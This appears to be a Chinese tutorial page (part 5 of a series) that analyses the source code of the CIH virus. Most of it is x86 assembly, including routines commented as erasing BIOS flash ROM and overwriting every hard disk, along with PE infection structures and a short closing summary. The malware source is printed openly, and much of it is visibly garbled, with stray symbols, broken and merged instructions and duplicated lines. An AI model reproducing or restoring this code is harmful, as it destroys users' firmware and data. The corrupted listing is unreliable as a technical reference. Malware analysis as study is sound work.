病毒程式原始碼實例剖析-CIH病毒[5]-php教程-PHP中文網

首頁

後端開發

php教程

病毒程式原始碼實例剖析-CIH病毒[5]

黄舟

Jan 17, 2017 am 11:21 AM

病毒程式原始碼實例剖析-CIH病毒[5]

push ecx
　　loop $
　　
　　;破壞BIOS中額外的000E0000 - 000E007F段的ROM資料，共80h個位元組
　　
　　xchg ecx, eax
　　loop $
　　
; 顯示並啟動BIOS的000E0000 - 000FFFFF段數據，共128 KB，該段可寫入訊息mov eax, 0f5555h
　　pop ecx ptr [eax], 20h
　　
　　loop $
　　
　　; 破壞BIOS的000FE000 - 000FE07F段數據，共80h字節
　　mov ah, 0e0h 　『 00F0000 - 000FFFFF段，共64 KB
　　mov word ptr (BooleanCalculateCode-@ 10)[esi], 100ch
　　call esi
　　
　　; 破壞所有硬碟
　　KillHardDisk:
　〜　　KillHardDisk:bumber 　〜〜『
　　push ebx
　　sub esp, 2ch
　　push 0c00001000h
　　mov bhpush, 08〠〦〦〦〠〠〦〠〠〠〠〝pushpusho〠〠) ecx
　　push ecx
　　push ecx
　　push 40000501h
　　頟
　　mov esi, esp
　　sub esp, 0ach
　　
　　;循環進行破壞
　　『 4h
　　
　　cmp word ptr [esi+06h], 0017h
　　je KillNextDataSection
　　
　　;換下一個硬碟
　　ChangeNextHardDisk:〜『〟〜〦〜]　　jmp LoopOfKillHardDisk
　　
　　;破壞下一個區域
　　KillNextDataSection:
　　add dword ptr [esi+ 10h], ebx
　　mov byte ptr [esi+4dh], FirstKillHardDiskNumber
　　
　　jmp　able PROMToWrite:
　　mov [eax], cl
　　mov [ecx], al
　　mov byte ptr [ eax], 80h
　　mov [eax], cl
　　mov [ecx], al
　　
　　ret 🀜EE:P0　　㟎　　ret 🀜
　　
　　xchg eax, edi
　　xchg edx, ebp
　　out dx, eot , edi
　　xchg edx, ebp
　　in al, dx
　　
　　BooleanCalculateCode = $g edi
　　xchg edx, ebp
　　out dx, eax
　　
　　xchg eax, edi
　　x 。
　　db IFSMgr_RemoveFileSystemApiHook-_PageAllocate
　　db UniToBCSPath-IFSMgr_RemoveFileSystemApiHook
　擯指令　db＀＀＂說話之差
　　
　　VxdCallIDTable dd 00010053h, 00400068h, 00400041h, 00400032h ;Vxd的呼叫編號〦〜>使用Vxd調用的個數
　　
　　;病毒版本和版權資訊定義
　　VirusVersionCopyright db ' CIH v' ;CIH病毒的標識
　　db MajorVirusVersion+'0' ;主版號
　　db '.'
　　db MinorVirusVersion+'0' ;次版本號'
　　db MinorVirusVersion+'0' ;次版本號'
　　db MinorVirusVersion+'0' ;次版本號'
　　db MinorVirusVersion+'0' ;　; 病毒大小
　　VirusSize = $ + SizeOfVirusCodeSectionTableEndMark(04h)
　　 + NumberOfSections*SizeOfVirusCodeSectionTable(08h)
　　＀　VirusGameDataStartAddress = VirusSize
　　@6 = VirusGameDataStartAddress ;病毒資料起始位址
　　
　　OnBusy db 0 ;「忙碌」標誌
　　FileModificationTime dd ? ;檔案修改時間
　　
　　FileNameBuffer db FileNameBufferSize dup(?) ;7fh長的檔案名稱緩衝區〠🀜　〠『〜『〜『Ｓ＀　〜〦〦〜〦〦〦〦〦〦〦〦〦〦》〦＀〜〦〦〦〜〦〦〜C＊〜〦〜〜〦〦〜〦〜〦〦〜C＜〦m〜〦〜C＀〜C＀〜C＊〜〜　 •
　　@8 = DataBuffer
　　NumberOfSections dw ? ; 區塊數目
　　TimeDateStamp dd ? ; 文件時間
　　SymbolsPointer dd ?
　　NumberOfSymbols dd ? ; 符號表中符號個數
　SizeOfOptionalHeader dw ?個檔案」的長度符號符號集 ; Magic dw ? ;標誌字(總是010bh)
　　LinkerVersion dw ? ;連接器版本號
。程式碼段起始RVA
　　BaseOfData dd ? ;資料段起始RVA
　　ImageBase dd ? ;裝入基址RVA
　　
　　@9 = $
　　SectionAlignment 對塊對齊sion dd ? ;所需作業系統版本號碼
　　ImageVersion dd ? ;使用者自訂版本號
　　SubsystemVersion dd ? ;所需子系統版本號
　　Reserved dd ? ; 保留
　　SizeOfImage ) ? 各部份總長izeOfImageHeaderToRead = $-NumberOfSections
　　NewAddressOfEntryPoint = DataBuffer
　　SizeOfImageHeaderToWrite = 04h
　　
　　StartOfSectionTable = @9
　　SectionName = StartOfSectionTable = @9
　　SectionName = StartOfSectionTable = @9
　
　　VirtualAddress = StartOfSectionTable+0ch ;區塊的RVA
　　SizeOfRawData = StartOfSectionTable+10h ; 區塊實體長度
PointerToRawData = StartOfSectionTable+14h ; 區塊實體偏移
　　PointerToRelocations = StartOfSectionTable+18h ; 重定位的偏移
　　PointerToLineNumbers = StartOfSection？ Table+20h ; 重定位項目數目
　　NumberOfLinenNmbers = StartOfSectionTable +22h ; 行號表的數目
　　Characteristics = StartOfSectionTable+24h ; 區塊屬性
　　SizeOfScetionTable = Characteristics+04h-SectionName ; 每塊表塊表所需要的數量所需要的記憶體的數量；　VirusNeedBaseMemory = $
　　VirusNeedBaseMemory = $

　　VirusTotalNeedMemory = @9
　　; + NumberOfSections(??)*SizeOfScetionTable(28h)
　　; + SOfVirusCodeS.? fVirusCodeSectionTable(08h)
　　; + SizeOfTheFirstVirusCodeSectionTable(04h)
　　
　　;病毒程式結束
　　VirusGame ENDS
　　END FileHeader
　　從上述程式碼分析過程中，我們可以看出，CIH病毒結構清晰，層次分明。此病毒程式的主幹結構與DOS病毒極為相似，只不過對病毒細節的處理都是依win95方法，全部系統呼叫都是採用Vxd。這樣做讓病毒程式更加底層、效率更高，也便於編程，與用Windows下的API函數相比，無須考慮病毒本身的複雜重定位過程；與使用中斷相比，又更能防止對程式的追蹤分析。

　　CIH病毒有兩個創新，一是病毒感染時查找感染對象文件的各塊之間的空白區域,把病毒自己的各種數據結構和代碼寫到其中（如果空白區域不夠就不傳染，這就是為什麼有些文件不會被感染的原因之一）；二是病毒發作時能破壞電腦硬件，不但要燒毀Flash Memory，還要毀壞硬碟。

　　出於安全的緣故，有關病毒發作、破壞硬體的這部分代碼，我們沒有給出詳細的分析。

以上就是病毒程式原始碼實例剖析-CIH病毒[5]的內容，更多相關內容請關注PHP中文網（www.php.cn）！

陳述

本文內容由網友自願投稿，版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容，請聯絡admin@php.cn

繼續使用PHP：耐力的原因Apr 19, 2025 am 12:23 AM

PHP仍然流行的原因是其易用性、靈活性和強大的生態系統。 1)易用性和簡單語法使其成為初學者的首選。 2)與web開發緊密結合，處理HTTP請求和數據庫交互出色。 3)龐大的生態系統提供了豐富的工具和庫。 4)活躍的社區和開源性質使其適應新需求和技術趨勢。

PHP和Python：探索他們的相似性和差異Apr 19, 2025 am 12:21 AM

PHP和Python都是高層次的編程語言，廣泛應用於Web開發、數據處理和自動化任務。 1.PHP常用於構建動態網站和內容管理系統，而Python常用於構建Web框架和數據科學。 2.PHP使用echo輸出內容，Python使用print。 3.兩者都支持面向對象編程，但語法和關鍵字不同。 4.PHP支持弱類型轉換，Python則更嚴格。 5.PHP性能優化包括使用OPcache和異步編程，Python則使用cProfile和異步編程。

PHP和Python：解釋了不同的範例Apr 18, 2025 am 12:26 AM

PHP主要是過程式編程，但也支持面向對象編程（OOP）；Python支持多種範式，包括OOP、函數式和過程式編程。 PHP適合web開發，Python適用於多種應用，如數據分析和機器學習。

PHP和Python：深入了解他們的歷史Apr 18, 2025 am 12:25 AM

PHP起源於1994年，由RasmusLerdorf開發，最初用於跟踪網站訪問者，逐漸演變為服務器端腳本語言，廣泛應用於網頁開發。 Python由GuidovanRossum於1980年代末開發，1991年首次發布，強調代碼可讀性和簡潔性，適用於科學計算、數據分析等領域。

在PHP和Python之間進行選擇：指南Apr 18, 2025 am 12:24 AM

PHP適合網頁開發和快速原型開發，Python適用於數據科學和機器學習。 1.PHP用於動態網頁開發，語法簡單，適合快速開發。 2.Python語法簡潔，適用於多領域，庫生態系統強大。

PHP和框架：現代化語言Apr 18, 2025 am 12:14 AM

PHP在現代化進程中仍然重要，因為它支持大量網站和應用，並通過框架適應開發需求。 1.PHP7提升了性能並引入了新功能。 2.現代框架如Laravel、Symfony和CodeIgniter簡化開發，提高代碼質量。 3.性能優化和最佳實踐進一步提升應用效率。

PHP的影響：網絡開發及以後Apr 18, 2025 am 12:10 AM

PHPhassignificantlyimpactedwebdevelopmentandextendsbeyondit.1)ItpowersmajorplatformslikeWordPressandexcelsindatabaseinteractions.2)PHP'sadaptabilityallowsittoscaleforlargeapplicationsusingframeworkslikeLaravel.3)Beyondweb,PHPisusedincommand-linescrip

PHP類型提示如何起作用，包括標量類型，返回類型，聯合類型和無效類型？Apr 17, 2025 am 12:25 AM

PHP類型提示提升代碼質量和可讀性。 1)標量類型提示：自PHP7.0起，允許在函數參數中指定基本數據類型，如int、float等。 2)返回類型提示：確保函數返回值類型的一致性。 3)聯合類型提示：自PHP8.0起，允許在函數參數或返回值中指定多個類型。 4)可空類型提示：允許包含null值，處理可能返回空值的函數。

See all articles